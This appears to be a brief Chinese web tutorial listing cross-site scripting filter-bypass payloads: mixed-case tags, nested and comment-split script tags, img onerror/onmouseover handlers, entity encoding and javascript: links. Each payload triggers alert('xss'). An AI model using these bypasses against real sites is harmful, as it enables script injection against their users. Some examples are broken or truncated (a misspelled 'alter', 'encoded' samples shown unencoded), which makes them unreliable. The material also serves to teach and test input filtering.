1、大小写混用
<ScRiPt>alert("xss")</ScriPT>
2、拼凑
后台可能对一些字符过滤了一次,但是过滤后的其余字符又重新拼凑
<scri<script>pt>alert("xss")</sc</script>ript>
过滤之后:<script>alert("xss")</script>
3、注释干扰
<scri<!--ganrao-->pt>alter('xss')</sc<!--ganrao-->ript>
4、使用img标签
在装载图像的过程中如果发生了错误,就会触发onerror事件
<img src=x onerror='alert("xss")'/>
鼠标指针移动到图片后执行Javascript代码
<img src=x onmouseover='alert("xss")'/>
5、编码
<img src=x onerror='alert("xss")'/>
把特殊符号 HTML 编码
<img src=x onerror='alert("xss")' />
也可以连同字母字符全部编码
<img src=x onerror='ale …… )'/>
6、在 <a> 标签中使用JavaScript协议
<a href="javascript:alert('xss')">请点我</a>
网友评论